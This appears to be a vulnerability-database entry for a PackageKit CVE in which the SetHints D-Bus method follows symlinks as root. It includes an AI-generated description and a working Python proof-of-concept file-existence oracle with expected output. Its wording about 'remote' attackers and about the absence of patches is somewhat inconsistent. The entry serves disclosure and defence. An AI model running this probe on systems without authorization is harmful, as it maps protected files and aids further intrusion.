CVE-2026-10294
Description
PackageKit up to 1.3.5 allows unprivileged users to probe any file's existence remotely via the SetHints D-Bus method.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A vulnerability exists in PackageKit versions up to and including 1.3.5, specifically in the g_file_test call in src/pk-transaction.c. The SetHints D-Bus method accepts a frontend-socket parameter, which is expected to be a path to a Unix socket. However, the g_file_test call follows symbolic links and runs as root, so the existence check is made with root's privileges on whatever the link points to, without adequate authorization [1].
Exploitation
An unprivileged, remote attacker can exploit this vulnerability by sending a crafted SetHints D-Bus request. The attacker needs to provide a frontend-socket argument that is a symbolic link pointing to an arbitrary file or directory on the system. The g_file_test function, when called with this symlink, will resolve it as root, enabling the attacker to probe for the existence of any file, including those in root-privileged directories [1].
Impact
Successful exploitation allows an unprivileged attacker to determine the existence of any file on the system. This information disclosure can be used to map out sensitive file locations or identify system configurations, potentially aiding in further attacks. The vulnerability does not grant elevated privileges or direct control over the system, but it enables unauthorized file probing [1].
Mitigation
PackageKit versions up to 1.3.5 are affected. A fix for this vulnerability is available in newer versions of PackageKit. Users are advised to update to a patched version as soon as possible. No specific version number for the fix or release date was disclosed in the available references [2].
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <=1.3.5
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The g_file_test() function follows symbolic links as root, allowing unauthorized file existence checks."
Attack vector
An unprivileged, remote attacker can call the SetHints D-Bus method on PackageKit. By supplying a symbolic link path as the frontend-socket parameter, the attacker can leverage the g_file_test() function's behavior to probe for the existence of any file on the system, even those they should not have access to [1]. This is possible because the SetHints method lacks a proper authorization check beyond verifying that the sender matches the transaction creator [1].
Affected code
The vulnerability resides in the `pk_transaction_set_hint` function within the file `src/pk-transaction.c`. Specifically, the `g_file_test(value, G_FILE_TEST_EXISTS)` call is at fault, as it follows symbolic links as root [1]. The `SetHints` method, which calls this function, lacks sufficient authorization checks [1].
What the fix does
The advisory does not provide a patch. Remediation guidance suggests that the vulnerability is addressed by ensuring that symbolic links are not followed when checking file existence for the frontend-socket parameter. This prevents unprivileged users from probing arbitrary files on the system.
Preconditions
- auth: The attacker must be an unprivileged user.
- network: The attacker can reach the PackageKit D-Bus interface remotely.
- input: The attacker must be able to provide a symbolic link path to the frontend-socket parameter.
Reproduction
First, set up a root-privileged directory /tmp/root_only_dir and put a txt file in it named exist.txt. Then create symlinks /var/tmp/pk-test/exist.txt -> /tmp/root_only_dir/exist.txt, and /var/tmp/pk-test/non_exist.txt -> /tmp/root_only_dir/non_exist.rpm.
Then run this PoC:
```python
import dbus
import sys
import os
import time

def probe_file(bus, symlink_path):
    pk = bus.get_object('org.freedesktop.PackageKit', '/org/freedesktop/PackageKit')
    tid = dbus.Interface(pk, 'org.freedesktop.PackageKit').CreateTransaction()
    trans = bus.get_object('org.freedesktop.PackageKit', tid)
    trans_iface = dbus.Interface(trans, 'org.freedesktop.PackageKit.Transaction')

    try:
        trans_iface.SetHints([f"frontend-socket={symlink_path}"])
        return 'EXISTS'
    except dbus.exceptions.DBusException as e:
        if 'does not exist' in str(e).lower():
            return 'NOT_FOUND'
        return 'EXISTS'

def main():
    if os.geteuid() == 0:
        print("[!] Run as normal user, not root!")
        sys.exit(1)

    bus = dbus.SystemBus()

    print("SetHints frontend-socket Symlink Oracle PoC")
    print(f"Running as: {os.getenv('USER')} (UID {os.getuid()})")
    print()

    test_files = [
        ("Text file", "/tmp/root_only_dir/exist.txt", "/var/tmp/pk-test/exist.txt"),
        ("Non-existent", "/tmp/root_only_dir/non_exist.rpm", "/var/tmp/pk-test/non_exist.txt"),
    ]

    for name, target, symlink in test_files:
        if not os.path.islink(symlink):
            print(f"{name}: symlink not found ({symlink}), create symlinks first")
            continue
        try:
            status = probe_file(bus, symlink)
            print(f"{name}: {status} (target: {target})")
            time.sleep(0.5)
        except Exception as e:
            print(f"{name}: Error probing {symlink} - {e}")

if __name__ == "__main__":
    main()
```
The expected output should be something like this:
```
Text file: EXISTS (target: /tmp/root_only_dir/exist.txt)
Non-existent: NOT_FOUND (target: /tmp/root_only_dir/non_exist.rpm)
```
This demonstrates this arbitrary file probing vulnerability. [1]
Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.